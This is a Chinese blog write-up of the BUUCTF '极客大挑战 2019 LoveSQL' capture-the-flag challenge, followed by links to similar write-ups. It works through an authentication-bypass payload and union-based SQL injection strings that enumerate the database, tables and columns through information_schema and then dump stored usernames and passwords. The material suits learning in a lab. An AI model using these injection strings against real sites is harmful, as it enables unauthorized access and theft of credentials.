[极客大挑战 2019]LoveSQL1

最新推荐文章于 2024-06-02 15:58:33 发布
最新推荐文章于 2024-06-02 15:58:33 发布
阅读量300 收藏
点赞数
分类专栏: 靶场练习 文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41571993/article/details/127163794
版权

该题目是关于SQL注入的靶场,所以我们首先尝试使用admin1' or 1=1-- +登录,得到回显:

img

说明该注入方式是正确的,然后最初我以为出现的password是一个MD5值,拿去解码发现并不是,然后将该账号和密码登录得到相同的页面,说明只是个提示成功的回显页面,接着我们猜测列数,利用1' union select 1,2,3-- +得到正确的列数回显:

img

接着利用1' union select 1,2,database()-- +来爆破出数据库:

img

注入1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'geek'-- +来爆破数据表:

img

猜测flag存在于I0ve1ysql1表中(当然也可以通过尝试另一个数据表来排除),使用1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'geek' and table_name = 'l0ve1ysq1'-- +来爆破列得:

img

接着使用1' union select 1,group_concat(username),group_concat(password) from geek.l0ve1ysq1-- +爆破出数据:

img

查看源码得到flag:

img

丙戌年1101
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
阿里云IoT创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 创新挑战赛》的分享,就挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 学院JAVA视频教程 新版 7大部分
BUUCTF---[挑战 2019]LoveSQL1
2201_75556700的博客
03-03 526
4.sql注入题一般会设计到数据库,因为会用到select查询,所以我们得要知道它的表中有多少列,于是我们用order by来查询列数。2.一般遇到登录,用户名会尝试admin,密码会尝试万能密码" or 1=1#或者' or 1=1#。这里尝试了第一种,但是不对。6.接着查表中有哪些字段,先查第一张表在密码输入框输入下面代码(查看geekuser表中字段),就得到了字段名,三个。7.接下来查第二张表的字段,在密码输入框中输入下面代码,可以得到字段名,发现和第一张表的字段名一样。
[挑战 2019]LoveSQL 1
qq_43618536的博客
07-01 709
BUUCTF的[挑战 2019]LoveSQL 1
buu [挑战 2019]LoveSQL 1
weixin_45642610的博客
01-10 1802
buu [挑战 2019]LoveSQL 1 -刷题个人日记 小白一个,写给自己看。 进去后是这样: 用户名输入1和1'测试 发现1'报错 有sql语法错误,说明有sql注入点且后台数据库是MariaDB 用户名输入sql注入基本公式:1' or 1=1;# 结果: 3bba40d66c98e28cf3bac11b45edbbab像是md5编码,试试解码后不行。 可能flag在其他表里,我们要知道有哪些表且表的属性有哪些。 慢慢来,payload: check.php?username=admin'
[挑战 2019]LoveSQL 1(SQL注入)
小谢的博客
06-12 4703
[挑战 2019]LoveSQL 1(SQL注入)
[挑战 2019]LoveSQL
weixin_52116519的博客
04-13 1100
考点:常规的sql注入 1、万能密码测试 2、解不了码,没用 3、但是可以注入,测试回显几个字段名,慢慢试 4、爆数据库名和用户名 5、 爆库名 6、爆表名 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()# 7、爆列名 1' union select 1,2,group_concat(column_name) from inform
buuctf-[挑战 2019]LoveSQL1(小宇特详解)
小宇的web博客
01-15 1104
buuctf-[挑战 2019]LoveSQL1(小宇特详解) 1.这里有账号和密码,这里先尝试一下万能密码(在账号那里注入) 1' or 1=1# 密码随便 这里继续进行注入,判断有几列 1' order by 3;# 这里试一试4 1' order by 4;# 这里通过union联合查询 1' union select 1,2,3;# 这里的2,3都是注入点 这里开始按部就班的注入吧 1' union select 1,2,database();# 1' union se
挑战2019】LoveSQL解题
Bird&Bird
10-25 1879
1、打开靶机:BUUCTF在线评测,选择web---->【挑战2019】LoveSQL 打开被测试站点,是这个样子的,是上一题EasySQL的延续。 2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下: 直接给出了密码。 使用正确的用户名和密码登录一下,结果还是 那使用MD5库碰撞一下,结果也没碰撞出来。 3、继续寻常注入吧。 爆破有多少列(字段数) username=admin&password=6ec1cab79005129..
BUUCTF WEB 挑战 2019 LoveSQL
Ethan552525的博客
07-27 480
题目: 解题: 1:输入万能密码 用户名:admin' or 1=1# 密 码:1 2:确定回显列 用户名:1' union select 1,2,3;# (select 1,2...逐步增加,直到不报错即得到正确的列数) 密 码:1 说明查询列数为3,回显列为2,3。 UNION 操作符用于合并两个或多个 SELECT 语句的结果集。 ...
[挑战 2019]LoveSQL1(BUCTF在线评测)
邓霖涛的博客
07-21 203
接下来查询l0ve1ysq1表,只能显示一条记录那么limit一直试验,到15条时候终于找到了。l0ve1ysq1可能就是存在flag的表,可以查询下l0ve1ysq1的表字段。得到以下结果存在表l0ve1ysq1和geekuser。一看页面和之前一个很像,只要sql注入登录就拿到flag。F12开发这调试模式,编辑http请求,方便注入。感觉geekuser就是刚才登录的用户表。登录成功了,没flag,好像没用。...
2019年三诺集团四周年庆典摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典摇滚跑活动方案
天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
与团队-与团队1
08-03
前言“工程问题都很简单。人际关系才是最难的。——比尔·库格伦,前Google工程部资深副总裁生活中总是充满了离奇的转折,就好像我们俩从没想过会合作写一本软件工程
BUUCTF Web [挑战 2019]LoveSQL
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 一、题目简介 进入题目连接是一个「登录」界面 登录「成功」会显示当前用户的账号和密码 登录「失败」则会则会提示错误的用户名和密码 二、思路分析         这一关是「SQL注入」漏洞,注入点.
语音控制系统的安全挑战与防御策略(下)
声纹感知 洞察芯声
05-29 1000
活性检测已成为VCS中一种普遍的防御策略,主要设计用来确定语音命令是否来自真实的人类。这种方法背后的基本前提是,大多数恶意命令都是机器生成的。这些命令通常通过扬声器播放或直接通过音频文件(如WAV文件)输入到VCS API中。与这些人工产生的命令不同,真正的人类用户不会以这种方式生成语音命令。因此,通过识别人类语音的特征,活性检测旨在过滤掉这些非人类、机器生成的输入,从而增强VCS的安全性。
Docker 安全及日志管理
最新发布
2301_77081516的博客
06-02 256
虚拟机通过添加 Hypervisor 层,虚拟出网卡、内存、CPU 等虚拟硬件,再在其上建立虚拟机,每个虚拟机都有自己的系统内核。而 Docker 容器则是通过隔离的方式,将文件系统、 进程、设备、网络等资源进行隔离,再对权限、CPU 资源等进行控制,最终让容器之间互不影响,容器无法影响宿主机。容器与宿主机共享内核、文件系统、硬件等资源。
内网安全之证书模版的管理
weixin_45910629的博客
05-29 1034
证书模板 Certificate templates 是 CA 证书颁发机构的一个组成部分,是证书策略中的重要元素,是用于证书注册、使用和管理的一组规则和格式。当 CA 收到对证书的请求时,必须对该请求应用一组规则和设置,以执行所请求的功能,例如证书颁发或更新。这些规则可以是简单的,也可以是复杂的,也可以适用于所有用户或特定的用户组。证书模板是在 CA 上配置并应用于传入证书请求的一组规则和设置。证书模板还向户机提供了关于如何创建和提交有效的证书请求的说明。基于证书模板的证书只能由企业 CA 颁发。
挑战 2019]LoveSQL 1
08-24
LoveSQL 1是挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解能力。 参赛者需要根据题目要求,在给定的表中使用合适的 SQL 查询语句,筛选出满足条件的数据,并将查询结果返回。 注意:LoveSQL 1是挑战2019中的一个具体题目,与其他题目无关。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丙戌年1101

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值